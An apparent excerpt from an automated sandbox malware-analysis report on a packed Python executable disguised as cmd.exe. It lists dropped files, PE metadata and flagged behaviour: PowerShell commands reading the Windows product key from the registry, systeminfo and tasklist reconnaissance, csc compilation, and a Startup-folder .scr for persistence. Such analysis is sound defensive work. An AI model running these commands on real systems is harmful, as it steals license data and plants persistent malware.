              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\Desktop\pyvenv.cfg
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: cmd.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: cmd.exeStatic file information: File size 6263156 > 1048576
              Source: cmd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: cmd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: cmd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: cmd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: cmd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: cmd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: cmd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: cmd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: cmd.exe, 00000001.00000002.2102140495.00007FFDFB076000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB30E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2108397549.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: cmd.exe, 00000001.00000002.2106778885.00007FFE126D1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2108397549.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: cmd.exe, 00000001.00000002.2107248205.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: cmd.exe, 00000001.00000002.2105906140.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: cmd.exe, 00000001.00000002.2103718969.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000041.00000000.1938364077.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp, rar.exe.0.dr
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.pdb source: powershell.exe, 0000002A.00000002.1859004442.000002168CE46000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: cmd.exe, 00000001.00000002.2106340866.00007FFE11EDC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: cmd.exe, 00000001.00000002.2106340866.00007FFE11EDC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.pdbhP source: powershell.exe, 0000002A.00000002.1859004442.000002168CE46000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: cmd.exe, 00000001.00000002.2107479396.00007FFE13301000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: cmd.exe, 00000001.00000002.2101639758.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: cmd.exe, 00000001.00000002.2102140495.00007FFDFB076000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: cmd.exe, 00000001.00000002.2105061798.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: cmd.exe, 00000001.00000002.2105587009.00007FFE11511000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: )i.pdb source: powershell.exe, 0000002A.00000002.1915922706.00000216A4BB6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: cmd.exe, 00000001.00000002.2107751391.00007FFE13331000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:15:42 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB30E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: cmd.exe, 00000001.00000002.2105325798.00007FFE10301000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB390000.00000040.00000001.01000000.0000000F.sdmp
              Source: cmd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: cmd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: cmd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: cmd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: cmd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
              Source: libcrypto-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1286c2
              Source: libffi-7.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9bb1
              Source: python310.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x175084
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1116d
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x49ec0
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11295
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13959
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9855f
              Source: libssl-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x3a1a3
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xa1bc
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x121bd
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f136
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14f2d
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xe5dd
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x2283b
              Source: bcdu5fii.dll.48.drStatic PE information: real checksum: 0x0 should be: 0x5947
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16d12
              Source: cmd.exeStatic PE information: real checksum: 0x5f9d97 should be: 0x5f954d
              Source: libffi-7.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98B1EB60 push edx; ret 10_2_00007FFD98B1EBFC
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98B1D2A5 pushad ; iretd 10_2_00007FFD98B1D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98B1FB35 pushad ; iretd 10_2_00007FFD98B1FB37
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98C302FD push ds; iretd 10_2_00007FFD98C303E2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98C372BB push cs; iretd 10_2_00007FFD98C372CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98C31A69 push ds; iretd 10_2_00007FFD98C31A6A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98C3862D push ebx; ret 10_2_00007FFD98C386CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98C3861D push ebx; ret 10_2_00007FFD98C3862A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD98C31029 pushad ; iretd 10_2_00007FFD98C3102A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FFD98C41B11 push ds; iretd 42_2_00007FFD98C41B12
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FFD98C40B5D push ds; iretd 42_2_00007FFD98C40B82
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FFD98C40B83 push ds; iretd 42_2_00007FFD98C40B82
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\libssl-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\libffi-7.dllJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\python310.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dllJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
